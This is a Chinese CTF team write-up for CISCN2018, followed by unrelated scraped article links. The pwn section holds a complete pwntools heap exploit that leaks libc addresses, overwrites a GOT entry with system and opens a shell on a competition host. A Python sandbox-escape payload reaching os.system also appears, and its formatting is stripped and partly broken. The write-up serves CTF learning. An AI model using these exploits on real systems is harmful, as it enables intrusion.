The Lounge战队 CISCN2018 Writeup

Pwn-Supermarket

from pwn import *

def add(name,price,size,des):
p.sendlineafter(">> ","1")
p.sendlineafter("name:",name)
p.sendlineafter("price:",str(price))
p.sendlineafter("descrip_size:",str(size))
p.sendlineafter("description:",des) def listall():
p.sendlineafter(">> ","3") def delete(name):
p.sendlineafter(">> ","2")
p.sendlineafter("name:",name) def change_price(name,price):
p.sendlineafter(">> ","4")
p.sendafter("name:",name)
p.sendlineafter("in:",str(price)) def change_des(name,size,des):
p.sendlineafter(">> ","5")
p.sendlineafter("name:",name)
p.sendlineafter("descrip_size:",str(size))
p.sendlineafter("description:",des) '''
atoi 0xf7643050 0xf75e4050
puts 0xf75f4140 0xf7603140
free 0xf765d750 0xf75af750
''' local=0
if local:
p=process('./task_supermarket')
libc=ELF('/lib/i386-linux-gnu/libc.so.6')
atoi_offset=libc.symbols['atoi']
sys_offset=libc.symbols['system']
else:
p=remote('117.78.27.192',32285)
atoi_offset=0x2d050
sys_offset=0x3a940 add('aaaa',100,0x50,'A'*0x50)
add('1111',100,0x50,'A'*0x50)
add('b'*12+'\x41',100,0x38,'B'*0x38)
add('cccc',100,0x60,'C'*0x60)
add('dddd',100,0x20,'D'*0x20)
delete('b'*12+'\x41')
change_des('cccc',0x20,'M'*0x24+p32(0x41)) add('eeee',100,0x38,'EEEE')
add('ffff',100,0x38,p32(101)+p32(0x38)+p32(0x804b048)+p32(0x41))
listall()
p.recvuntil("101, des.") data=p.recv(4)
print data
atoi_addr=u32(data.ljust(4,'\x00'))
print hex(atoi_addr) libc_base=atoi_addr-atoi_offset
system=libc_base+sys_offset
print "system",hex(system) change_des('eeee',0x38,p64(system)) p.sendlineafter(">> ","/bin/sh\x00")
p.interactive()

Web-EasyWeb

无力吐槽的题目,空密码。

Crypto-Flag_in_your_hand

基本逻辑很简单,看showFlag函数。

判断ic状态来决定是否是正确Token。

文件唯一有改动ic的地方就是这了,看一下逻辑。就是a数组所有值-3转成ASCII字符就是正确Token。

Misc-寻找入侵者

用mac地址爆破出honey密码

然后使用airdecap-ng提取出另一个数据包,在包里面发现出题人博客以及key.rar的下载地址,下载后解压得到key.pcap,发现可疑字符串,即为flag

Misc-Memory_Forensic

很荣幸是三血。其实能更快。首先用IDA看一下逻辑。发现已经出现了”CISCN{“ “}” 和几个疑似flag的字符串,然后他会用snprintf去写内存,那么真flag应该会出现在内存中。
我是用的Vmware14配Mac
OS High Siera,这样能拿到完整内存Dump。首先关闭System Integrity Protection,然后kextutil
agent.kext加载,然后它会黑屏,在黑屏一瞬间切出去,暂停虚拟机。拿到整个内存Dump。然后用16进制编辑器搜索“CISCN{”就行。

Misc-Picture

首先给了个假的PNG,其实是JPG。FFD9结尾处有数据,提出来,file一下发现是zlib数据,然后直接binwalk解压,给了个Base64字符串,解密后是KP什么的,还有Python
code,当时想偏了,以为是PYC文件,修了半天发现格式全错。后来把头部改成PK,是个正常的ZIP文件。然后要密码。

注意右边注释,Python控制台报错?试一下。

没错,integer division or modulo by zero这是密码。成功解压后是个UUEncode,解密就行了。

Misc-验证码

没啥好说的,签到题,进去就有flag。

Misc-RUN

Python沙箱逃逸,试了很多Payload。所有的popen都会报unkonw error。所有的二阶dict也会报错,后来想到找一个globals
x = [x for x in [].class.base.subclasses() if x.name == ‘ca’+’tch_warnings’][0].init
x.getattribute(“func_global”+”s”)[‘linecache’].dict[‘o’+’s’].dict‘sy’+’stem’
x.getattribute(“func_global”+”s”)[‘linecache’].dict[‘o’+’s’].dict‘sy’+’stem’
x.getattribute(“func_global”+”s”)[‘linecache’].dict[‘o’+’s’].dict‘sy’+’stem’

Reverse-RE

程序先检测flag格式头,然后根据“_”将内容分为三个部分,分别加密之后与字符串比较,前两个部分的内容很容易得到,解开md5值为tofu和gana,第三部分flag的MD5无法解开,卡了两三个小时,看到第三个函数与其他两个的区别是后面将大量数据写到一个叫“flag”的文件中,但是需要异或的两个key值,分别和数据奇数项和偶数项异或,因为看到第一个数据和第三个数据相同,猜测文件是jepg格式,果然解出来是张图片,连在一起即为完整flag.

CISCN2018 Writeup的更多相关文章

  1. 2016第七季极客大挑战Writeup

    第一次接触CTF,只会做杂项和一点点Web题--因为时间比较仓促,写的比较简略.以后再写下工具使用什么的. 纯新手,啥都不会.处于瑟瑟发抖的状态. 一.MISC 1.签到题 直接填入题目所给的SYC{ ...

  2. ISCC2016 WriteUp

    日期: 2016-05-01~ 注:隔了好久才发布这篇文章,还有两道Pwn的题没放,过一阵子放上.刚开始做这个题,后来恰巧赶上校内CTF比赛,就把重心放在了那个上面. 这是第一次做类似于CTF的题,在 ...

  3. 参加 Tokyo Westerns / MMA CTF 2nd 2016 经验与感悟 TWCTF 2016 WriteUp

    洒家近期参加了 Tokyo Westerns / MMA CTF 2nd 2016(TWCTF) 比赛,不得不说国际赛的玩法比国内赛更有玩头,有的题给洒家一种一看就知道怎么做,但是做出来还需要洒家拍一 ...

  4. 爱春秋之戏说春秋 Writeup

    爱春秋之戏说春秋 Writeup 第一关 图穷匕见 这一关关键是给了一个图片,将图片下载到本地后,打开以及查看属性均无任何发现,尝试把图片转换为.txt格式.在文本的最后发现这样一串有规律的代码: 形 ...

  5. 《安全智库》:48H急速夺旗大战通关writeup(通关策略)

    作者:ByStudent   题目名字 题目分值 地址 MallBuilder2 350 mall.anquanbao.com.cn MallBuilder1 200 mall.anquanbao.c ...

  6. iscc2016 pwn部分writeup

    一.pwn1 简单的32位栈溢出,定位溢出点后即可写exp gdb-peda$ r Starting program: /usr/iscc/pwn1 C'mon pwn me : AAA%AAsAAB ...

  7. We Chall-Training: Encodings I -Writeup

    MarkdownPad Document html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,a,ab ...

  8. We Chall-Encodings: URL -Writeup

    MarkdownPad Document html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,a,ab ...

  9. We Chall-Training: ASCII—Writeup

    MarkdownPad Document html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,a,ab ...

随机推荐

  1. 接口测试工具中 post请求如何传递多维数组

    1,请求参数为数组时,可以采用传递 json格式的形式传递请求参数(字段及字段对应的值如查是字符,都应该用双引号括起来.用单引号会无法识别),后台接收的数据为json . 2,直接以数组格式来请请求 ...

  2. 自动匹配输入的内容(AutoCompleteTextView及MultiAutoCompleteTextView)

    自动匹配输入的内容 AutoCompleteTextView 1.功能动态匹配输入的内容,如百度搜索引擎当输入文本时,可以根据内容显示匹配的热门信息 2.属性:android:completionTh ...

  3. C语言-数字字符串转换成这个字符串对应的数字(十进制、十六进制)

    数字字符串转换成这个字符串对应的数字(十进制.十六进制) (1)数字字符串转换成这个字符串对应的数字(十进制) 要求:这个字符串参数必须包含一个或者多个数字,函数应该把这些数字转换为整数并且返回这个整 ...

  4. centos7安装BitCoin客户端

    一.安装依赖环境 [root@localhost src]# yum install autoconf automake libtool libdb-devel boost-devel libeven ...

  5. ajax获取json 格式绑定下拉框

    [{"ClassID":"1","ClassName":"C#","CategorysID":&qu ...

  6. MySQL的分表与分区

    MySQL分表分区是解决大数据量导致MySQL性能低下的两种方法. 什么是MySQL分表 从表面意思上看,MySQL分表就是将一个表分成多个表,数据和数据结构都有可能会变.MySQL分表分为垂直分表和 ...

  7. Mac终端神器zsh

    Mac终端神器zsh 先上一张图 1.背景介绍 在unix 内核的操作系统中,当然现在衍生出好多分支,linux ,OS X 都算. shell 就算和上面这些系统内核指令打交道的一座桥梁,我们通过键 ...

  8. JQUERY动态绘制表格,实现动态添加一行,删除一行

    HTML部分 <table style="width: 100%;" id="TABYESTERDAY11"></table> < ...

  9. vue环境搭建及简单接触

    1.安装node环境 首先官网安装nodejs,下载地址https://nodejs.org/en/ 很多情况下,npm i 命令安装的包都是要科学上网的,或者就是国际网,下载速度很慢,不过有个淘宝镜 ...

  10. java.lang.UnsupportedOperationException at java.util.AbstractList

    常常使用Arrays.asLisvt()后调用add,remove这些method时出现 Java.lang.UnsupportedOperationException异常.这是由于: Arrays. ...